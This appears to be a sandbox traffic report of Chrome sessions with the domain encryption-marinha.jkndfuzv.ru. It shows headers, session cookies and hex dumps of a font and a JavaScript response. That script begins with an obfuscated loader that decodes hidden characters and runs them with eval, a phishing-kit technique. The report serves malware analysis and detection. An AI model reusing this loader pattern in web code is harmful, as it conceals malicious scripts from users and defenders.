                                                                  2025-03-14 11:31:01 UTC1369INData Raw: e2 7b 95 55 6b 5d 9c cb f6 08 a5 23 7f ed f7 4e 66 a8 e5 0a f9 d5 c5 a9 c7 23 63 4f 93 1d bf 47 04 43 fb 82 87 2a 48 c7 8f d1 c3 39 c5 a6 73 dc 75 9e ee e5 63 68 f7 63 e3 75 2f 53 26 0b a9 87 9d 72 2c d1 e7 f6 b1 d4 a1 7c c2 a2 da 8a 7c 3f b9 20 fe 3a 8d 43 33 1b ab d4 f5 6d 4d c3 e2 dd 36 ee 35 62 69 95 22 f0 46 f8 d9 7a 68 37 a5 a8 21 6e b5 b2 92 5f 40 ab 16 92 96 5b e2 15 6e 46 29 46 b7 00 4f 05 6e b1 9b fa f9 5a cb 80 d9 34 ac 08 96 d6 da 40 6d 7b 3f f8 24 61 96 de 62 e5 00 a4 59 3c a2 bd a6 1e 75 01 cd 9c 00 1f 0d c7 da 08 15 91 3f d2 c4 4f 7f c1 0d 6c 0a 22 cb 59 c2 51 e4 59 52 b4 8c ef 09 b2 25 0c b9 b2 75 36 d6 a1 d6 98 53 0f e7 62 e9 dd f0 9f 66 d4 22 1b 6b 13 ea f6 c1 6d 7d 2a ba 94 7c f6 e9 dd fc 87 22 db 87 d7 e0 12 e6 4a d0 b7 e2 a7 bb 35 45
                                                                  Data Ascii: {Uk]#Nf#cOGC*H9suchcu/S&r,||? :C3mM65bi"Fzh7!n_@[nF)FOnZ4@m{?$abY<u?Ol"YQYR%u6Sbf"km}*|"J5E
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 34 0b c9 ab 60 21 06 9f 15 10 0a 11 56 b6 61 9b a3 60 19 bd 82 2f ef c3 27 94 de ec ac 7c 55 54 c1 6a 83 d9 78 80 42 b4 21 58 23 ee bd fb 0a 3c f6 0f 28 19 2d 72 45 2f 9d 7c c7 ad 83 d8 2f 0d 8f 8c 1e f3 0b 28 e3 21 4d 8f fb ea 20 10 30 08 28 18 b0 44 f7 bf 00 88 20 61 11 d1 62 c4 ba f7 8a 41 c1 e1 43 42 87 c9 3d 6c 7b 81 47 00 38 11 5e 87 bf 23 b8 f0 b5 38 9c ef ea 0c ae 85 bb ad d9 82 3b e8 87 fa ef ed 3d c0 a3 eb 3f 0b b7 80 4d ef 65 b7 82 c3 97 dd 06 3e bc 8c 32 b8 6e 01 00 00 00 0d 47 0c ca 60 3c 20 d5 88 13 d9 02 c9 08 14 13 80 6e 8b 60 31 74 c6 dc 8c db d7 e9 d4 6a dc 38 9e 1a bf 1e 5f 00 01 05 55 88 89 bf ca 0c 2c 3a b7 0d 0a 83 0a d2 de 02 4a df 91 b3 2b 6d b3 43 b5 a5 48 08 52 40 cb a8 7f 90 13 46 b7 a0 cc 41 5a ff 9e 89 be 8c b4 05 1a d8 6c 4e
                                                                  Data Ascii: 4`!Va`/'|UTjxB!X#<(-rE/|/(!M 0(D abACB=l{G8^#8;=?Me>2nG`< n`1tj8_U,:J+mCHR@FAZlN
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 3a f0 a8 7c e2 2f 37 5c 00 8e a5 ab fe c8 4d 7e f8 24 cc da 65 7a 3b ea 60 78 86 ff b3 c6 4f 36 07 f0 1a 51 20 a0 99 2b b4 a0 13 bd 18 20 6b 45 56 76 cd d7 7a ed d7 c7 ba aa 3b b1 b4 64 a3 7a aa 0f 66 70 46 7f 21 15 af 12 d9 74 5e ed 72 69 d8 84 35 5b ae ba 2b fa 7d 68 88 d0 99 2c 36 2d b4 e3 a4 1b 8f 95 8e bb 7f 97 86 e2 ba 5c 5f 5c df 69 51 46 4e 6c 02 f0 b1 d8 e7 2b 8e a3 a9 3f be b2 11 27 f6 00 43 55 69 d3 a5 df 48 6c 3e eb b5 05 1b 3e ba b4 16 0c 1b 33 6e 8c b6 ef fe ea b0 51 5b 67 5b ed 66 bb c5 76 da fd f6 d8 d0 81 a1 a3 43 33 b6 8e 1c 8d 18 91 60 24 d2 66 95 22 dd f3 ef ac 3b 07 1e e5 27 52 13 68 c6 e2 f5 de f1 3b 8f f0 81 ef 71 fe f1 fd 49 ba 7e 09 cf 1d a4 7f fa e7 21 f4 b6 ef 13 3a 82 ff 4c fc 0f 8e df 4c fc 77 bc e8 8d 3f ec d3 17 d9 de 8d b4
                                                                  Data Ascii: :|/7\M~$ez;`xO6Q + kEVvz;dzfpF!t^ri5[+}h,6-\_\iQFNl+?'CUiHl>>3nQ[g[fvC3`$f";'Rh;qI~!:LLw?


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.449754104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:00 UTC1411OUTGET /GDSherpa-vf2.woff2 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: font
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:01 UTC1151INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:01 GMT
                                                                  Content-Type: font/woff2
                                                                  Content-Length: 93276
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="GDSherpa-vf2.woff2"
                                                                  Last-Modified: Fri, 14 Mar 2025 11:31:01 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jZbv%2BrKCh1a5ogwX1UzQXnZYxyZIu4U7pLsuKr1EkSudLbjv4Sjf3Wt28xxUux84x6OfL7HklNlky3bTlJGWdXkx%2Fx%2Bd7WUiHI3FPo5vk4ZmwtX1hjk2rk5dl7TJ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4501&min_rtt=4485&rtt_var=1292&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2319&delivery_rate=620479&cwnd=251&unsent_bytes=0&cid=2678b0107d7615d0&ts=191&x=0"
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: MISS
                                                                  Accept-Ranges: bytes
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203713aad17c3ee-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1452&min_rtt=1444&rtt_var=557&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1983&delivery_rate=1936339&cwnd=191&unsent_bytes=0&cid=0c52a18eda61cb3e&ts=671&x=0"
                                                                  2025-03-14 11:31:01 UTC218INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2
                                                                  Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8 ea 01 a9 6e cf 19 c7 21 ef 85 0b 87 09 13 e9 52 7d 47 4c 0e c3 35 6e 21 02 bb de e5 5e e4 9b b2 cb 49 10 e5 82 c3 41 89 fa 8c 03 e7 80 55 08 8a bb 2c 26 bf 84 75 7a a2 bc 81 1a 45 7f 52 ae 4b 2f 47 4c d1 0e eb 23 c5 82 f2 55 13 14 41 38 25 09 72 64 c4 d3 45 2c 7d a1 88 b0 27 65 e7 c3 80 f1 75 10 eb 82 33 17 64 44 9a 0c d1 e1 7d c8 bc 9f 3a ee fe 30 9b 61 ba 8a 23 4f 38 bb 7c c4 37 ee e8 7b dc a7 7d 85 6f 10 dd 17 fe 9a bf 28 bc 44 dc 91 8f 48 58 1f 0d d2 77 aa 3b 46 e2 0a 17 67 b8 2b 17 f1 1e ee 98 67 0e 78 af ae 2c af 40 7e 3c cf 4b ce cd d7 94 da c8 d9 5a 4a 77 dc 1e 1c e6 94 fa f2 5e 86 21 e5 cb 7b 3a 88 0f 3c 9b dd 60 4e e1 e2 68 da 14 30 c9
                                                                  Data Ascii: iH!rP4Z[Zsor8bOn!R}GL5n!^IAU,&uzERK/GL#UA8%rdE,}'eu3dD}:0a#O8|7{}o(DHXw;Fg+gx,@~<KZJw^!{:<`Nh0
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 40 df 48 36 81 26 dc dc 00 be 84 1a 10 87 78 f8 77 ed 73 5e 32 f0 61 76 b7 80 28 01 65 7b 7c 25 2b 16 3a f9 b3 aa 42 55 38 95 6b e1 1a 39 c9 03 82 2b 28 62 54 e4 2a b3 77 9b e4 02 05 b6 7d 55 62 5f 4d 28 19 54 d5 53 a1 fe 7f af 9b 27 1d 42 5e 8a 2a 4d 61 f7 78 4a d7 99 24 18 8f 95 38 f5 77 78 da 56 ff de 0c cc d0 da 7b 5b e9 66 5e ed 60 5c 44 fd fd 51 cd 63 86 92 30 41 0c 10 03 14 29 89 14 10 8c 5a d7 55 37 4a dd a8 73 23 2f b7 5c a6 f3 78 cf 08 c4 90 6e f8 fc cf 99 19 00 3e 7f 6a 6a 0a d8 4e 4e 48 14 16 00 83 f8 39 50 48 53 c0 cb 41 71 40 9e 58 9d 50 6b 7f 80 7e 86 29 43 64 38 04 73 eb ac 0f ab 51 b2 25 63 2c 93 45 b3 66 1b 63 c9 d8 46 f4 18 25 51 23 86 44 0a 4a 98 88 51 98 f9 7e 94 be cf b7 5f 6d d1 58 9b 43 ac 9a ec ef 1d a2 f6 e2 82 98 95 48 a4 54 ef
                                                                  Data Ascii: @H6&xws^2av(e{|%+:BU8k9+(bT*w}Ub_M(TS'B^*MaxJ$8wxV{[f^`\DQc0A)ZU7Js#/\xn>jjNNH9PHSAq@XPk~)Cd8sQ%c,EfcF%Q#DJQ~_mXCHT
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 8a fa 5a 4f 65 65 dd 26 71 26 aa 9e 8a 69 21 f1 26 a3 0b 8e ba 51 d4 2b 0a c0 ac 4e 83 df fb a1 5c de df c7 84 01 fc 85 d9 d5 02 79 f8 fd 64 32 f8 09 c2 23 f7 e2 70 d1 d1 c9 3b f3 0e 00 18 00 94 f8 6a dd 3a 62 8a c5 68 b4 dd 4e 26 7b bd 74 7a 30 c8 e7 c7 63 6d a6 d3 6a 75 b1 68 36 d7 eb b0 6c b7 c3 21 4d 7b c3 b2 f3 b9 20 ac 56 b2 5c 90 e5 a2 aa 00 e8 3a 18 c6 c6 b2 78 1e 42 51 74 9c e2 dd 8e 82 31 b9 81 40 3c fe 02 45 0b 86 21 08 49 2e a4 52 50 d4 64 18 1c ef 93 20 58 56 85 e7 d3 69 41 08 42 81 b3 59 8b 28 72 9c 24 59 96 17 e7 72 37 aa 5a f2 79 45 29 30 28 72 4a 82 92 40 4a 94 b2 d6 60 cc 61 2e d7 35 c5 39 6b bd 1f 84 70 04 f9 eb 29 3e 3a f2 e6 70 d0 42 8c 29 7d bf fc 53 55 08 71 64 b7 f5 76 7e de bd 3e ef b3 ad d1 64 ac 45 09 43 4d 00 13 52 a1 14 c6 cc
                                                                  Data Ascii: ZOee&q&i!&Q+N\yd2#p;j:bhN&{tz0cmjuh6l!M{ V\:xBQt1@<E!I.RPd XViABY(r$Yr7ZyE)0(rJ@J`a.59kp)>:pB)}SUqdv~>dECMR
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 7f 40 63 04 55 47 4a 1a b8 76 82 18 e2 be 7f 98 5c 6f cf 48 b0 3e 7a 74 20 6e 6a 3a c7 a8 26 89 dd 9c ce 4a 89 29 b5 84 28 8d e8 42 8d cb 52 2e e7 b5 55 fc e7 e4 60 b1 88 1c 02 a2 4c ad e2 4a c0 a7 71 de f5 83 2c 93 d1 af ba 96 1a ac d4 fd a9 01 f2 00 e4 f3 c9 4b c9 31 22 75 bc 5f af 93 71 45 48 68 20 6a ce 87 d4 5e 6d c8 92 b3 9b 33 02 45 51 e3 91 59 f6 88 6e 11 41 c9 51 d4 07 af b7 01 06 c8 6a c4 96 af dd 69 f0 0f d8 2a e2 6c 0f 28 6b 62 73 c4 d9 65 0c f8 d4 d4 09 f8 01 4f de 00 9e 3c 65 77 fb 95 b2 51 cd 5a 2d 2b f5 cc 75 78 4c af fb 96 83 c8 47 b6 7e c9 c9 31 e8 2e 43 ee 30 e2 88 71 87 4c 38 68 ca 7e 33 f6 9a b3 db 82 9d 73 49 48 dd 97 33 02 6c b7 62 eb dc 50 aa db df 51 37 61 c3 6d 2b 1f 89 6c 26 ac 64 4c bb b3 c3 d4 b4 9e e6 82 bc 81 ef 9f 57 54 9b
                                                                  Data Ascii: @cUGJv\oH>zt nj:&J)(BR.U`LJq,K1"u_qEHh j^m3EQYnAQji*l(kbseO<ewQZ-+uxLG~1.C0qL8h~3sIH3lbPQ7am+l&dLWT
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 25 a2 5d a6 81 69 5c c2 02 08 27 52 07 15 bd 8f 9d f8 5b 07 70 bf e6 cd 17 08 28 e0 26 fd 17 dd 73 03 02 74 77 7f 99 04 23 6d 76 0d 32 11 48 04 00 7e 05 4e 0d eb 27 75 3c 6c 2c 6c c3 77 3b c3 70 2f 60 4d 31 dc 0b 04 77 e6 7c 3e 08 bf d8 ae a8 6d 33 4b 77 ab fe 6d 4b 26 9b 99 f5 f8 32 b7 6b 0f b8 bf 83 50 1d ee 08 8b 97 e8 34 77 fc e5 f1 38 0e 97 80 b0 b2 db a3 1e 8d 47 d2 b7 45 f8 ab ba 35 d4 b0 2d 4c f4 7d fc f3 6d 4d 5e 76 d5 64 74 6e 2f 82 b1 f0 ba 4b d3 55 ea 85 b5 62 be 83 e1 69 86 6a b8 c8 8b c1 5a 4a a7 c5 11 6f 33 73 2e f6 36 fe aa 50 09 03 a4 df ff 20 62 90 9f 7a 3c 54 2d ee db 6f 86 1a 42 b8 06 61 c8 b8 4c 63 74 4b 67 b7 25 94 42 e4 80 77 f2 e4 71 78 aa 0d 93 d0 11 8b 6c 8e 39 7b d9 62 0f ab 99 71 5b 25 5a a0 b1 8b d0 01 6a 9b a6 58 47 b9 db 32
                                                                  Data Ascii: %]i\'R[p(&stw#mv2H~N'u<l,lw;p/`M1w|>m3KwmK&2kP4w8GE5-L}mM^vdtn/KUbijZJo3s.6P bz<T-oBaLctKg%Bwqxl9{bq[%ZjXG2
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: ca 78 d7 62 9b 53 26 cb f2 94 82 52 db 64 9b 90 ef f0 56 d4 b5 db 01 43 9d 8a b5 f0 fb a2 ac 59 d4 56 bf ab 5c 03 37 ed 95 d2 73 b7 fe 81 58 e0 38 ed af 97 31 12 0c 48 e1 f9 c9 a4 05 3d 65 49 26 ef b5 8a d8 5c c1 66 d9 9b 7f 4a 61 a4 ad 89 d2 bb 3a 50 80 24 57 2b 3c 37 75 4a a4 39 6c fd 00 ea 85 4e 3b d1 c2 7d 2a 16 aa 37 04 44 84 b4 15 68 36 d7 58 3c c7 7b 64 ad 83 d4 40 7b ae 43 1d 30 a1 9f dc 34 b4 b9 58 af 48 29 03 7d 8d e5 0a e4 80 1a 54 40 49 9e d6 ed 54 8c 1a 33 b6 75 12 46 2c f1 86 29 13 ec b0 ac 2e 4d 03 ff e1 d0 5e e0 b6 1f 78 4e e1 05 af 16 7e ae 78 b5 5c 88 e9 3d 2f aa fc 1c 9c 77 84 19 8f 32 b7 b3 ad 8a e3 ba 21 3a 1e f6 66 ed 44 5f 78 88 5b cf 4e f3 b8 70 1e d3 ed 25 43 1a e8 25 13 2b 5e b8 7f 0d 84 0f bb 88 fa ca 7e b0 b4 80 f9 34 ed d7 83
                                                                  Data Ascii: xbS&RdVCYV\7sX81H=eI&\fJa:P$W+<7uJ9lN;}*7Dh6X<{d@{C04XH)}T@IT3uF,).M^xN~x\=/w2!:fD_x[Np%C%+^~4
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: e8 a6 25 b9 05 ab 5e b1 cc e9 b5 05 00 be 89 33 a2 88 a1 ef ad f7 2b 65 ce 62 9b 09 89 62 ce cc 8e 62 9b 7e 09 fd ba 9f 54 dc 68 3b 09 0d 48 30 b4 aa f6 37 ec 1d b1 56 da 1c 80 5e 6b 61 1a 3d f7 6a 85 cb 7d 36 b4 33 47 16 4a 86 79 29 a7 b0 5d cd ca ec 3d 02 27 36 a9 9e 9c 91 a0 c8 7e d0 77 09 b5 6c 85 91 57 85 bd 0f 93 70 89 ba a1 2c 89 43 4c e9 1a c6 79 86 00 17 c2 d5 04 6d dc 34 d6 3d f3 a3 ed f9 e1 93 87 26 87 2a 6a d6 2e 84 e4 84 a0 1c 47 71 9c 6a 88 71 eb 87 be 57 98 bd a7 03 58 ba 74 ae dc ed 27 ae 86 3b 8b 11 4e c2 ad d0 7f 0e 40 70 00 c2 f9 c0 06 82 1b 3c 78 e0 c5 97 fd 66 69 01 42 20 c2 b0 11 01 04 06 1b 38 2c 04 20 a2 f0 42 22 48 0c 2e 68 60 58 a0 38 e0 78 70 84 f0 36 2b 92 20 c4 c9 59 31 eb 42 a5 e1 99 b3 82 84 24 88 d4 83 20 69 c5 3a 5d d2 07
                                                                  Data Ascii: %^3+ebbb~Th;H07V^ka=j}63GJy)]='6~wlWp,CLym4=&*j.GqjqWXt';N@p<xfiB 8, B"H.h`X8xp6+ Y1B$ i:]
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: c7 c8 c3 55 e1 e2 f0 84 40 41 40 b6 af ca eb a4 97 dc c3 e0 d6 e6 96 5d 84 c8 bd 51 7b da f6 50 1e bc bd c3 7a 7a e4 5e d3 7d 23 29 db aa 71 f1 db 56 6f 5d f0 b7 70 cb d1 68 01 cf d7 3c d7 47 61 79 5c 27 a1 a7 7b 4b 40 b8 be 47 46 8f d4 93 59 87 ec 0e f0 5d 9b ac 6c f2 eb fa d4 3c d6 d4 a5 ee 5a 09 a0 d8 d4 06 0f fd 8b 7e ad 49 60 dd df af 12 ad 1c 53 69 a6 ff b8 4b 8c fc f7 31 74 ed 67 cb 9c 3a 7f 4c 63 68 fe 21 c1 65 ec 8f 59 dc fa 1f fb e4 79 0a f2 6a 85 7c c8 0d 95 05 17 61 45 50 0c 27 48 8a 66 58 8e 17 c4 f8 73 b4 d8 c4 b2 9d 6e fd 1e 20 21 6c 2b 02 8a e1 04 49 d1 0c cb f1 82 58 ea 4a 19 45 ad 75 a8 8e 61 5a ed ce 75 70 bd 87 cd 21 62 af 76 84 9f 23 51 57 de 1e a5 db 58 86 72 f4 e5 de eb 31 90 cf b7 1f 0c be bc 0b 06 fe 8a 1e 00 0b d9 b4 8e a7 87 49
                                                                  Data Ascii: U@A@]Q{Pzz^}#)qVo]ph<Gay\'{K@GFY]l<Z~I`SiK1tg:Lch!eYyj|aEP'HfXsn !l+IXJEuaZup!bv#QWXr1I
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 56 74 50 56 a9 ba 0b 6a a8 ad ea 36 e9 4e 2f 3b ff c3 13 40 b6 a3 83 05 3a 07 23 42 02 23 28 86 13 24 45 33 2c c7 0b a2 24 9f af 8e 70 f3 a7 99 8f 22 98 f7 02 af 2f 46 50 0c 27 48 01 45 33 2c 27 7c ce 90 84 47 cd 09 4f e1 95 a2 52 d7 14 6a d1 d5 63 b0 b3 77 e8 84 b3 4b 04 50 7d a2 c1 60 71 78 02 91 44 a6 50 69 f4 65 f0 36 9a e2 e6 be 20 06 29 8c b0 96 cd f3 38 70 97 27 88 f1 11 08 45 62 89 54 26 57 28 55 6a cd 6a 05 3a 1d 7a c3 e5 98 da df 33 99 2d d6 b6 b6 76 1c 4e d7 e7 f7 a6 b7 db 9e 6f 0e ae de 97 ad d1 81 af b9 39 78 24 00 e8 22 c7 ef 92 72 02 b9 ec 11 7c 29 89 de c4 85 7f 6f b3 a9 2f 79 d1 0f 6e 5e 15 32 9d 87 87 5c 2b 14 94 60 2a 6a 9a cf d0 9a 90 f5 68 c8 f5 5f 0e 09 57 64 88 f8 f7 4c 10 00 dd 83 a3 b9 29 ac 48 a7 c6 e5 61 cb ad 07 3a 3c ec d0 28
                                                                  Data Ascii: VtPVj6N/;@:#B#($E3,$p"/FP'HE3,'|GORjcwKP}`qxDPie6 )8p'EbT&W(Ujj:z3-vNo9x$"r|)o/yn^2\+`*jh_WdL)Ha:<(


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.449755104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:00 UTC1388OUTGET /34xdLZylu9sNLs7eTij0Uqz9prscZpLQu67104 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:01 UTC1094INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:01 GMT
                                                                  Content-Type: application/javascript
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="34xdLZylu9sNLs7eTij0Uqz9prscZpLQu67104"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZXG9FQ6T7HN42S%2FJloFobS5sCBP3GuTB2OY3ezS0YwoCJvTcbcDke9%2FAwJQT6maP1dRsyorYHpW%2FPRcDBYAQ6WLZHB87A6Dl8ptPaJzZ3oHQTWv0kw1y%2B7czHAVy"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5650&min_rtt=5614&rtt_var=2131&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2297&delivery_rate=507303&cwnd=251&unsent_bytes=0&cid=92d37ae086a1a0bb&ts=99&x=0"
                                                                  vary: accept-encoding
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203713af8b44411-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1558&rtt_var=588&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1960&delivery_rate=1855146&cwnd=203&unsent_bytes=0&cid=a5fb66151f2f624c&ts=429&x=0"
                                                                  2025-03-14 11:31:01 UTC275INData Raw: 33 37 61 32 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 65 63 6f 64 65 41 6e 64 45 76 61 6c 75 61 74 65 28 6b 65 79 29 20 7b 0d 0a 20 20 63 6f 6e 73 74 20 62 69 6e 61 72 79 53 74 72 69 6e 67 20 3d 20 5b 2e 2e 2e 6b 65 79 5d 0d 0a 20 20 20 20 2e 6d 61 70 28 63 68 61 72 20 3d 3e 20 4e 75 6d 62 65 72 28 27 ef be a0 27 20 3e 20 63 68 61 72 29 29 0d 0a 20 20 20 20 2e 6a 6f 69 6e 28 27 27 29 0d 0a 20 20 20 20 2e 72 65 70 6c 61 63 65 28 2f 2e 7b 38 7d 2f 67 2c 20 62 79 74 65 20 3d 3e 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 70 61 72 73 65 49 6e 74 28 62 79 74 65 2c 20 32 29 29 29 3b 0d 0a 20 20 0d 0a 20 20 28 30 2c 20 65 76 61 6c 29 28 62 69 6e 61 72 79 53 74 72 69 6e 67 29 3b 0d 0a 20 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0d 0a 7d 0d 0a 0d 0a 63
                                                                  Data Ascii: 37a2function decodeAndEvaluate(key) { const binaryString = [...key] .map(char => Number('' > char)) .join('') .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2))); (0, eval)(binaryString); return true;}c
